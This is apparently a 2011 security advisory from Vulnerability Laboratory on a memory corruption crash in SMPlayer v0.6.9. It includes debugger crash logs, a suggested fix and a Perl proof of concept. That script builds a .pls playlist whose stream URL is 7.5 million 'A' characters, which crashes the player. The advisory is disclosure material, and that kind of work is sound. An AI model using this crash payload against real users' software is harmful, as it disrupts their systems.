SMPlayer v0.6.9 - Memory Corruption Vulnerability

Document Title:
===============
SMPlayer v0.6.9 - Memory Corruption Vulnerability



Release Date:
=============
2011-08-19


Vulnerability Laboratory ID (VL-ID):
====================================
64


Product & Service Introduction:
===============================
SMPlayer intends to be a complete front-end for MPlayer, from basic features like playing videos, DVDs, and VCDs to more advanced 
features like support for MPlayer filters and more. One of the most interesting features of SMPlayer: it remembers the settings 
of all files you play. So you start to watch a movie but you have to leave... don t worry, when you open that movie again it will 
resume at the same point you left it, and with the same settings: audio track, subtitles, volume...

Other additional interesting features:

    * Configurable subtitles. You can choose font and size, and even colors for the subtitles.
    * Audio track switching. You can choose the audio track you want to listen. Works with avi and mkv. And of course with DVDs.
    * Seeking by mouse wheel. You can use your mouse wheel to go forward or backward in the video.
    * Video equalizer, allows you to adjust the brightness, contrast, hue, saturation and gamma of the video image.
    * Multiple speed playback. You can play at 2X, 4X... and even in slow motion.
    * Filters. Several filters are available: deinterlace, postprocessing, denoise... and even a karaoke filter (voice removal).
    * Audio and subtitles delay adjustment. Allows you to sync audio and subtitles.
    * Advanced options, such as selecting a demuxer or video & audio codecs.
    * Playlist. Allows you to enqueue several files to be played one after each other. Autorepeat and shuffle supported too.
    * Preferences dialog. You can easily configure every option of SMPlayer by using a nice preferences dialog.
    * Possibility to search automatically for subtitles in opensubtitles.org.
    * Translations: currently SMPlayer is translated into more than 20 languages, including Spanish, German, French, Italian, Russian, Chinese, Japanese....
    * It is multiplatform. Binaries available for Windows and Linux.
    * SMPlayer is under the GPL license.

(Copy of the Vendor Homepage: http://smplayer.sourceforge.net/index.php?tr_lang=en)


Abstract Advisory Information:
==============================
Vulnerability Lab Team discovered a Memory Corruption Vulnerability on SMPlayer v0.6.9.


Vulnerability Disclosure Timeline:
==================================
2011-08-19:	Public or Non-Public Disclosure



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A Memory Corruption Vulnerability is detected on SmPlayer. An attacker can crash the software over the url stream function. 
Attackers can crash the software local or remote by user inter action over stream-lists.


--- Logs ---
C:/Program Files (x86)/SMPlayer/mplayer/mplayer.exe -noquiet -nofs -nomouseinput -sub-fuzziness 1 -identify -slave -vo direct3d,
 -nokeepaspect -priority abovenormal -framedrop -nodr -double -wid 4852742 -colorkey 0x020202 -monitorpixelaspect 1 -ass -embeddedfonts 
-ass-line-spacing 0 -ass-font-scale 1 -ass-styles C:/Users/Rem0ve/.smplayer/styles.ass -fontconfig -font Arial -subfont-autoscale 0 
-subfont-osd-scale 20 -subfont-text-scale 20 -subcp ISO-8859-1 -subpos 100 -cache 1000 -osdlevel 0 -prefer-ipv4 -vf-add screenshot 
-slices -af equalizer=0:0:0:0:0:0:0:0:0:0 -softvol -softvol-max 110 http://[over-sized+string_A+]


--- DEBUG LOG ---
///registers
EAX 00000000
ECX 00069304
EDX 00000002
EBX 282F0020
ESP 0022ADBC
EBP 0022ADC4
ESI 0C279B40 UNICODE \\\"A+\\\"
EDI 382F1000
EIP 77C17026 msvcrt.77C17026
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 1.0000000000000000000
ST1 empty %#.19L
ST2 empty 1.0000000000000000000
ST3 empty %#.19L
ST4 empty 67.000000000000000000
ST5 empty 445.00000000000000000
ST6 empty 387.48437500000000000
ST7 empty 387.98437500000000000
               3 2 1 0      E S P U O Z D I
FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT)
FCW 037F  Prec NEAR,64  Mask    1 1 1 1 1 1


--- ERROR LOG ---
ECX=00069304 (decimal 430852.)
DS:[ESI]=[0C279B40]=00410041
ES:[EDI]=[382F1000]=???

382f1000 doesnt exist in the program aka not allowed .. so memcopy fails...


//analyze -v of the crash
FAULTING_IP: 
msvcrt!memcpy+33
77c16fa3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 77c16fa3 (msvcrt!memcpy+0x00000033)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 382f1000
Attempt to write to address 382f1000

FAULTING_THREAD:  00000c90
DEFAULT_BUCKET_ID:  STRING_DEREFERENCE
PROCESS_NAME:  image00400000
ERROR_CODE: (NTSTATUS) 0xc0000005 - De instructie op 0x%08lx verwijst naar geheugen op 0x%08lx. De lees- of schrijfbewerking (\\\"%s\\\") op het geheugen is mislukt.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - De instructie op 0x%08lx verwijst naar geheugen op 0x%08lx. De lees- of schrijfbewerking (\\\"%s\\\") op het geheugen is mislukt.

EXCEPTION_PARAMETER1:  00000001
EXCEPTION_PARAMETER2:  382f1000
WRITE_ADDRESS:  382f1000 

FOLLOWUP_IP: 
msvcrt!memcpy+33
77c16fa3 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

NTGLOBALFLAG:  70
APPLICATION_VERIFIER_FLAGS:  0
PRIMARY_PROBLEM_CLASS:  STRING_DEREFERENCE
BUGCHECK_STR:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE
LAST_CONTROL_TRANSFER:  from 6a23aedb to 77c16fa3

STACK_TEXT:  
0022adc4 6a23aedb 37658244 0b6e0032 00e4e71e msvcrt!memcpy+0x33
WARNING: Stack unwind information not available. Following frames may be wrong.
0022adf4 00570c53 00dc79e4 0022aeec ffffffff QtCore4!ZN7QString6appendERKS_+0x7b
0022ae74 005d7091 00dc75b8 0022aeec ffffffff image00400000+0x170c53
0022af64 6a1cca27 00000000 02450030 0022af94 image00400000+0x1d7091
0022afe4 6a1cde61 00000000 02450030 0022b084 QtCore4!Z17qt_message_output9QtMsgTypePKc+0x57
0022b074 00488dcf 006726b0 07130030 0022b1fc QtCore4!Z6qDebugPKcz+0xb1
0022b304 00493e97 00dcd768 0022b36c 00000000 image00400000+0x88dcf
0022b394 00493f61 00dcd768 ffffffff 0022b424 image00400000+0x93e97
0022b3a4 004975b8 00dcd768 00e733f0 0022b3d4 image00400000+0x93f61
0022b424 004a0638 00dcd768 00000000 00000029 image00400000+0x975b8
0022b4e4 6a340a0f 00dcd768 00000000 00000029 image00400000+0xa0638
0022b5e4 65101f27 00e733f0 00000005 00000006 QtCore4!ZN11QMetaObject8activateEP7QObjectiiPPv+0x58f
0022b614 651023da 00e733f0 00000000 00e733f0 QtGui4!ZN7QAction9triggeredEb+0x47
0022b634 656df96e 00e733f0 00000000 0022b6d4 QtGui4!ZN7QAction8activateENS_11ActionEventE+0x6a
0022b644 655ad278 01377560 01377560 003d0000 QtGui4!ZN11QToolButton14nextCheckStateEv+0x2e
0022b6d4 655ad5e6 01392c38 0022bfbc 00000000 QtGui4!ZN15QAbstractButton12focusInEventEP11QFocusEvent+0x1a8
0022b6f4 656df6ec 01377560 0022bfac 00000003 QtGui4!ZN15QAbstractButton17mouseReleaseEventEP11QMouseEvent+0x66
0022b714 6517bd0d 01377560 0022bfac 0022b7a0 QtGui4!ZN11QToolButton17mouseReleaseEventEP11QMouseEvent+0x1c
0022b8f4 655ac567 01377560 0022bfac 01377560 QtGui4!ZN7QWidget5eventEP6QEvent+0x48d
0022b914 656e1dcc 01377560 0022bfac 0022bfac QtGui4!ZN15QAbstractButton5eventEP6QEvent+0x67
0022b934 6510c8ac 01377560 0022bfac 0022bfac QtGui4!ZN11QToolButton5eventEP6QEvent+0x4c
0022b964 6510f2b7 00d805e8 01377560 0022bfac QtGui4!ZN19QApplicationPrivate13notify_helperEP7QObjectP6QEvent+0xcc
0022bcd4 6a32984a 0022fe00 01377560 0022bfac QtGui4!ZN12QApplication6notifyEP7QObjectP6QEvent+0x12b7
0022bd64 6510db27 0022fe00 01377560 0022bfac QtCore4!ZN16QCoreApplication14notifyInternalEP7QObjectP6QEvent+0xca
0022be34 6518bb86 01377560 0022bfac 01377560 QtGui4!ZN19QApplicationPrivate14sendMouseEventEP7QWidgetP11QMouseEventS1_S1_PS1_R8QPointerIS0_E+0x447
0022c094 6518e730 0138ef78 0022db1c 0022c304 QtGui4!ZN15QSessionManager6cancelEv+0xc86
0022db64 77d18709 000a0468 00000202 00000000 QtGui4!ZN19QApplicationPrivate10closePopupEP7QWidget+0x1a20
0022db90 77d187eb 6518d430 000a0468 00000202 USER32!InternalCallWinProc+0x28
0022dbf8 77d189a5 00000000 6518d430 000a0468 USER32!UserCallWinProcCheckWow+0x150
0022dc58 77d189e8 0022ddb0 00000000 0022fb08 USER32!DispatchMessageWorker+0x306
0022dc68 6a35fc81 0022ddb0 0022ddb0 00000000 USER32!DispatchMessageW+0xf
0022fb08 65192970 003dfe88 0022fb20 003dc6d8 QtCore4!ZN21QEventDispatcherWin3213processEventsE6QFlagsIN10QEventLoop17ProcessEventsFlagEE+0x971
0022fb38 6a329168 003dfe88 0022fb50 0022fb58 QtGui4!Z25qWinProcessConfigRequestsv+0x1d0
0022fb78 6a329371 0022fca0 0022fc00 0022fc08 QtCore4!ZN10QEventLoop13processEventsE6QFlagsINS_17ProcessEventsFlagEE+0x48
0022fc28 6a32f1af 0022fca0 0022fc90 0022fcc8 QtCore4!ZN10QEventLoop4execE6QFlagsINS_17ProcessEventsFlagEE+0xf1
0022fcc8 005d5f61 0022fd80 0022fd70 0022fe00 QtCore4!ZN16QCoreApplication4execEv+0xdf
0022fe28 005edb51 00000001 00d805b0 00d80558 image00400000+0x1d5f61
0022fef8 005ed7da 00400000 00000000 00241f08 image00400000+0x1edb51
0022ff78 004011e7 00000001 003d44d8 003d2cd0 image00400000+0x1ed7da
0022ffb0 00401258 00000002 00000009 0022fff0 image00400000+0x11e7
0022ffc0 7c816d4f 00f1f6f2 00f1f772 7ffdd000 image00400000+0x1258
0022fff0 00000000 00401240 00000000 78746341 kernel32!BaseProcessStart+0x23


SYMBOL_STACK_INDEX:  0
SYMBOL_NAME:  msvcrt!memcpy+33
FOLLOWUP_NAME:  MachineOwner
MODULE_NAME: msvcrt
IMAGE_NAME:  msvcrt.dll
DEBUG_FLR_IMAGE_TIMESTAMP:  411098b9
STACK_COMMAND:  ~0s ; kb
FAILURE_BUCKET_ID:  STRING_DEREFERENCE_c0000005_msvcrt.dll!memcpy

BUCKET_ID:  APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_WRITE_msvcrt!memcpy+33
Followup: MachineOwner
---------

0:000> 
ExceptionAddress: 77c16fa3 (msvcrt!memcpy+0x00000033)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 382f1000
Attempt to write to address 382f1000
0:000>


Pictures:
						../mem1.png



Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local attackers or by remote attacker with userinteraction on stream ...


#!/usr/bin/perl
=gnk
     
=cut
##############################################################################
###################################################################
my $header1="[playlist]\n";
my $header2="NumberOfEntries=1\n";
my $header3="File1=http://";
my $bof="\x41" x 7500000;
###################################################################
open(myfile,'>> 7500000.pls');
print myfile $header1.$header2.$header3.$bof;
###################################################################


Solution - Fix & Patch:
=======================
Restrict the URL Requests to a working maximum size & set a own exception-handling for over-sized requests.



Security Risk:
==============
The security risk of the vulnerability is estimated as medium because of the remote crash method.


Credits & Authors:
==================
Vulnerability Research Laboratory - Pim Campers (X4lt)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory